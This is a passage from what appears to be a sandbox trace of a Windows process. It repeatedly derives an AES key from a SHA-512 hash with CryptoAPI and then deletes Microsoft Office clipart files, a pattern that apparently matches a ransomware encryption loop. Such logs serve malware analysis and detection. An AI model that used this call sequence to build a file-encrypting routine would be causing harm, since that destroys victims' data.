dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0183.797] wcslen (_String="\\\\?\\") returned 0x4 [0183.935] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF") returned 1 [0183.935] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04267_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04267_.wmf")) returned 1 [0183.937] CryptDestroyKey (hKey=0x9ad138) returned 1 [0183.937] wcslen (_String="OK") returned 0x2 [0183.937] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0183.937] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0183.937] CryptDestroyKey (hKey=0x9ad738) returned 1 [0183.937] CryptDestroyHash (hHash=0x9ad1b8) returned 1 [0183.937] CryptReleaseContext (hProv=0x8e3440, dwFlags=0x0) returned 1 [0183.976] CryptCreateHash (in: hProv=0x8e2f78, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444764 | out: phHash=0x1d444764) returned 1 [0183.976] CryptHashData (hHash=0x9ad4b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0183.976] CryptDeriveKey (in: hProv=0x8e2f78, Algid=0x6610, hBaseData=0x9ad4b8, dwFlags=0x4, phKey=0x1d444768 | out: phKey=0x1d444768*=0x9ad438) returned 1 [0183.976] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0183.977] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0183.977] wcslen (_String="\\\\?\\") returned 0x4 [0184.091] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF") returned 1 [0184.091] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04269_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04269_.wmf")) returned 1 [0184.093] CryptDestroyKey (hKey=0x9ad378) returned 1 [0184.093] wcslen (_String="OK") returned 0x2 [0184.093] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0184.093] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0184.093] CryptDestroyKey (hKey=0x9ad438) returned 1 [0184.093] CryptDestroyHash (hHash=0x9ad4b8) returned 1 [0184.093] CryptReleaseContext (hProv=0x8e2f78, dwFlags=0x0) returned 1 [0184.095] CryptCreateHash (in: hProv=0x8e2ef0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444a1c | out: phHash=0x1d444a1c) returned 1 [0184.095] CryptHashData (hHash=0x9ad438, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0184.095] CryptDeriveKey (in: hProv=0x8e2ef0, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d444a20 | out: phKey=0x1d444a20*=0x9ad738) returned 1 [0184.095] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0184.095] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0184.095] wcslen (_String="\\\\?\\") returned 0x4 [0184.324] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF") returned 1 [0184.324] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04323_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04323_.wmf")) returned 1 [0184.325] CryptDestroyKey (hKey=0x9ad478) returned 1 [0184.325] wcslen (_String="OK") returned 0x2 [0184.325] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0184.325] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0184.325] CryptDestroyKey (hKey=0x9ad738) returned 1 [0184.325] CryptDestroyHash (hHash=0x9ad438) returned 1 [0184.325] CryptReleaseContext (hProv=0x8e2ef0, dwFlags=0x0) returned 1 [0184.327] CryptCreateHash (in: hProv=0x8e3330, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0184.327] CryptHashData (hHash=0x9ad238, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0184.327] CryptDeriveKey (in: hProv=0x8e3330, Algid=0x6610, hBaseData=0x9ad238, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad2b8) returned 1 [0184.327] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0184.327] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0184.327] wcslen (_String="\\\\?\\") returned 0x4 [0184.365] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 1 [0184.366] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04326_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04326_.wmf")) returned 1 [0184.367] CryptDestroyKey (hKey=0x9ad138) returned 1 [0184.367] wcslen (_String="OK") returned 0x2 [0184.367] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0184.367] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0184.367] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0184.367] CryptDestroyHash (hHash=0x9ad238) returned 1 [0184.367] CryptReleaseContext (hProv=0x8e3330, dwFlags=0x0) returned 1 [0184.369] CryptCreateHash (in: hProv=0x8e2e68, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447f4 | out: phHash=0x1d4447f4) returned 1 [0184.369] CryptHashData (hHash=0x9ad8b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0184.369] CryptDeriveKey (in: hProv=0x8e2e68, Algid=0x6610, hBaseData=0x9ad8b8, dwFlags=0x4, phKey=0x1d4447f8 | out: phKey=0x1d4447f8*=0x9ad1f8) returned 1 [0184.369] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0184.369] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0184.369] wcslen (_String="\\\\?\\") returned 0x4 [0184.480] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF") returned 1 [0184.480] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04332_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04332_.wmf")) returned 1 [0184.481] CryptDestroyKey (hKey=0x9ad538) returned 1 [0184.481] wcslen (_String="OK") returned 0x2 [0184.481] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0184.481] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0184.481] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0184.481] CryptDestroyHash (hHash=0x9ad8b8) returned 1 [0184.481] CryptReleaseContext (hProv=0x8e2e68, dwFlags=0x0) returned 1 [0184.483] CryptCreateHash (in: hProv=0x8e2e68, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0184.483] CryptHashData (hHash=0x9ad838, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0184.483] CryptDeriveKey (in: hProv=0x8e2e68, Algid=0x6610, hBaseData=0x9ad838, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad2b8) returned 1 [0184.483] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0184.483] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0184.483] wcslen (_String="\\\\?\\") returned 0x4 [0184.644] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF") returned 1 [0184.644] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04355_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04355_.wmf")) returned 1 [0184.645] CryptDestroyKey (hKey=0x9ad278) returned 1 [0184.645] wcslen (_String="OK") returned 0x2 [0184.645] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0184.645] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0184.645] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0184.645] CryptDestroyHash (hHash=0x9ad838) returned 1 [0184.645] CryptReleaseContext (hProv=0x8e2e68, dwFlags=0x0) returned 1 [0184.647] CryptCreateHash (in: hProv=0x8e2ef0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444974 | out: phHash=0x1d444974) returned 1 [0184.647] CryptHashData (hHash=0x9ad738, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0184.647] CryptDeriveKey (in: hProv=0x8e2ef0, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d444978 | out: phKey=0x1d444978*=0x9ad778) returned 1 [0184.647] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0184.647] CryptSetKeyParam (hKey=0x9ad778, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0184.647] wcslen (_String="\\\\?\\") returned 0x4 [0184.741] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF") returned 1 [0184.741] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04369_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04369_.wmf")) returned 1 [0184.742] CryptDestroyKey (hKey=0x9ad138) returned 1 [0184.742] wcslen (_String="OK") returned 0x2 [0184.742] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0184.742] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0184.742] CryptDestroyKey (hKey=0x9ad778) returned 1 [0184.742] CryptDestroyHash (hHash=0x9ad738) returned 1 [0184.742] CryptReleaseContext (hProv=0x8e2ef0, dwFlags=0x0) returned 1 [0184.743] CryptCreateHash (in: hProv=0x8e2d58, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447dc | out: phHash=0x1d4447dc) returned 1 [0184.743] CryptHashData (hHash=0x9ad2b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0184.743] CryptDeriveKey (in: hProv=0x8e2d58, Algid=0x6610, hBaseData=0x9ad2b8, dwFlags=0x4, phKey=0x1d4447e0 | out: phKey=0x1d4447e0*=0x9ad2f8) returned 1 [0184.743] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0184.744] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0184.744] wcslen (_String="\\\\?\\") returned 0x4 [0184.896] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 1 [0184.896] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04384_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04384_.wmf")) returned 1 [0184.897] CryptDestroyKey (hKey=0x9ad878) returned 1 [0184.897] wcslen (_String="OK") returned 0x2 [0184.897] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0184.897] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0184.897] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0184.897] CryptDestroyHash (hHash=0x9ad2b8) returned 1 [0184.897] CryptReleaseContext (hProv=0x8e2d58, dwFlags=0x0) returned 1 [0184.898] CryptCreateHash (in: hProv=0x8e32a8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448e4 | out: phHash=0x1d4448e4) returned 1 [0184.898] CryptHashData (hHash=0x9ad8b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0184.898] CryptDeriveKey (in: hProv=0x8e32a8, Algid=0x6610, hBaseData=0x9ad8b8, dwFlags=0x4, phKey=0x1d4448e8 | out: phKey=0x1d4448e8*=0x9ad638) returned 1 [0184.898] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0184.898] CryptSetKeyParam (hKey=0x9ad638, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0184.899] wcslen (_String="\\\\?\\") returned 0x4 [0184.962] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF") returned 1 [0184.962] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04385_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04385_.wmf")) returned 1 [0184.963] CryptDestroyKey (hKey=0x9ad578) returned 1 [0184.963] wcslen (_String="OK") returned 0x2 [0184.963] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0184.963] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0184.963] CryptDestroyKey (hKey=0x9ad638) returned 1 [0184.963] CryptDestroyHash (hHash=0x9ad8b8) returned 1 [0184.963] CryptReleaseContext (hProv=0x8e32a8, dwFlags=0x0) returned 1 [0184.965] CryptCreateHash (in: hProv=0x8e3000, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0184.965] CryptHashData (hHash=0x9ad138, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0184.965] CryptDeriveKey (in: hProv=0x8e3000, Algid=0x6610, hBaseData=0x9ad138, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad478) returned 1 [0184.965] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0184.965] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0184.965] wcslen (_String="\\\\?\\") returned 0x4 [0185.016] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID") returned 1 [0185.016] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BABY_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\baby_01.mid")) returned 1 [0185.017] CryptDestroyKey (hKey=0x9ad4b8) returned 1 [0185.017] wcslen (_String="OK") returned 0x2 [0185.017] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0185.017] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0185.017] CryptDestroyKey (hKey=0x9ad478) returned 1 [0185.017] CryptDestroyHash (hHash=0x9ad138) returned 1 [0185.017] CryptReleaseContext (hProv=0x8e3000, dwFlags=0x0) returned 1 [0185.019] CryptCreateHash (in: hProv=0x8e3550, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44477c | out: phHash=0x1d44477c) returned 1 [0185.019] CryptHashData (hHash=0x9ad4b8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.019] CryptDeriveKey (in: hProv=0x8e3550, Algid=0x6610, hBaseData=0x9ad4b8, dwFlags=0x4, phKey=0x1d444780 | out: phKey=0x1d444780*=0x9ad338) returned 1 [0185.019] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0185.019] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0185.019] wcslen (_String="\\\\?\\") returned 0x4 [0185.058] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF") returned 1 [0185.058] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00116_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00116_.wmf")) returned 1 [0185.059] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0185.059] wcslen (_String="OK") returned 0x2 [0185.059] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0185.059] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0185.059] CryptDestroyKey (hKey=0x9ad338) returned 1 [0185.059] CryptDestroyHash (hHash=0x9ad4b8) returned 1 [0185.059] CryptReleaseContext (hProv=0x8e3550, dwFlags=0x0) returned 1 [0185.061] CryptCreateHash (in: hProv=0x8e3550, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44483c | out: phHash=0x1d44483c) returned 1 [0185.061] CryptHashData (hHash=0x9ad678, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.061] CryptDeriveKey (in: hProv=0x8e3550, Algid=0x6610, hBaseData=0x9ad678, dwFlags=0x4, phKey=0x1d444840 | out: phKey=0x1d444840*=0x9ad578) returned 1 [0185.061] CryptSetKeyParam (hKey=0x9ad578, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0185.061] CryptSetKeyParam (hKey=0x9ad578, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0185.061] wcslen (_String="\\\\?\\") returned 0x4 [0185.251] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 1 [0185.252] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00141_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00141_.wmf")) returned 1 [0185.253] CryptDestroyKey (hKey=0x9ad838) returned 1 [0185.253] wcslen (_String="OK") returned 0x2 [0185.253] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0185.253] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0185.253] CryptDestroyKey (hKey=0x9ad578) returned 1 [0185.253] CryptDestroyHash (hHash=0x9ad678) returned 1 [0185.253] CryptReleaseContext (hProv=0x8e3550, dwFlags=0x0) returned 1 [0185.255] CryptCreateHash (in: hProv=0x8e3a18, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444824 | out: phHash=0x1d444824) returned 1 [0185.255] CryptHashData (hHash=0x9ad238, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.255] CryptDeriveKey (in: hProv=0x8e3a18, Algid=0x6610, hBaseData=0x9ad238, dwFlags=0x4, phKey=0x1d444828 | out: phKey=0x1d444828*=0x9ad5b8) returned 1 [0185.255] CryptSetKeyParam (hKey=0x9ad5b8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0185.255] CryptSetKeyParam (hKey=0x9ad5b8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0185.255] wcslen (_String="\\\\?\\") returned 0x4 [0185.625] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF") returned 1 [0185.625] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00146_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00146_.wmf")) returned 1 [0185.626] CryptDestroyKey (hKey=0x9ad278) returned 1 [0185.626] wcslen (_String="OK") returned 0x2 [0185.626] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0185.626] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0185.626] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0185.626] CryptDestroyHash (hHash=0x9ad238) returned 1 [0185.626] CryptReleaseContext (hProv=0x8e3a18, dwFlags=0x0) returned 1 [0185.628] CryptCreateHash (in: hProv=0x8e3198, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444794 | out: phHash=0x1d444794) returned 1 [0185.629] CryptHashData (hHash=0x9ad138, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.629] CryptDeriveKey (in: hProv=0x8e3198, Algid=0x6610, hBaseData=0x9ad138, dwFlags=0x4, phKey=0x1d444798 | out: phKey=0x1d444798*=0x9ad238) returned 1 [0185.629] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0185.629] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0185.629] wcslen (_String="\\\\?\\") returned 0x4 [0185.634] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF") returned 1 [0185.634] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00155_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00155_.wmf")) returned 1 [0185.635] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0185.635] wcslen (_String="OK") returned 0x2 [0185.635] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0185.635] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0185.635] CryptDestroyKey (hKey=0x9ad238) returned 1 [0185.635] CryptDestroyHash (hHash=0x9ad138) returned 1 [0185.635] CryptReleaseContext (hProv=0x8e3198, dwFlags=0x0) returned 1 [0185.637] CryptCreateHash (in: hProv=0x8e3220, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444974 | out: phHash=0x1d444974) returned 1 [0185.637] CryptHashData (hHash=0x9ad138, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.638] CryptDeriveKey (in: hProv=0x8e3220, Algid=0x6610, hBaseData=0x9ad138, dwFlags=0x4, phKey=0x1d444978 | out: phKey=0x1d444978*=0x9ad1f8) returned 1 [0185.638] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0185.638] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0185.638] wcslen (_String="\\\\?\\") returned 0x4 [0185.643] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF") returned 1 [0185.643] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00160_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00160_.wmf")) returned 1 [0185.644] CryptDestroyKey (hKey=0x9ad738) returned 1 [0185.644] wcslen (_String="OK") returned 0x2 [0185.644] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0185.644] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0185.644] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0185.644] CryptDestroyHash (hHash=0x9ad138) returned 1 [0185.644] CryptReleaseContext (hProv=0x8e3220, dwFlags=0x0) returned 1 [0185.647] CryptCreateHash (in: hProv=0x8e3330, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448b4 | out: phHash=0x1d4448b4) returned 1 [0185.647] CryptHashData (hHash=0x9ad278, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.647] CryptDeriveKey (in: hProv=0x8e3330, Algid=0x6610, hBaseData=0x9ad278, dwFlags=0x4, phKey=0x1d4448b8 | out: phKey=0x1d4448b8*=0x9ad178) returned 1 [0185.647] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0185.647] CryptSetKeyParam (hKey=0x9ad178, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0185.647] wcslen (_String="\\\\?\\") returned 0x4 [0185.753] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF") returned 1 [0185.753] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD00173_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd00173_.wmf")) returned 1 [0185.754] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0185.754] wcslen (_String="OK") returned 0x2 [0185.754] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0185.754] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0185.754] CryptDestroyKey (hKey=0x9ad178) returned 1 [0185.754] CryptDestroyHash (hHash=0x9ad278) returned 1 [0185.754] CryptReleaseContext (hProv=0x8e3330, dwFlags=0x0) returned 1 [0185.757] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0185.757] CryptHashData (hHash=0x9ad538, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.757] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad538, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad338) returned 1 [0185.757] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0185.757] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0185.757] wcslen (_String="\\\\?\\") returned 0x4 [0185.771] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 1 [0185.771] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BD05119_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bd05119_.wmf")) returned 1 [0185.772] CryptDestroyKey (hKey=0x9ad5f8) returned 1 [0185.772] wcslen (_String="OK") returned 0x2 [0185.772] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0185.772] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0185.772] CryptDestroyKey (hKey=0x9ad338) returned 1 [0185.772] CryptDestroyHash (hHash=0x9ad538) returned 1 [0185.772] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0185.774] CryptCreateHash (in: hProv=0x8e3550, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444974 | out: phHash=0x1d444974) returned 1 [0185.774] CryptHashData (hHash=0x9ad178, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0185.774] CryptDeriveKey (in: hProv=0x8e3550, Algid=0x6610, hBaseData=0x9ad178, dwFlags=0x4, phKey=0x1d444978 | out: phKey=0x1d444978*=0x9ad438) returned 1 [0185.775] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0185.775] CryptSetKeyParam (hKey=0x9ad438, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0185.775] wcslen (_String="\\\\?\\") returned 0x4 [0185.827] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft 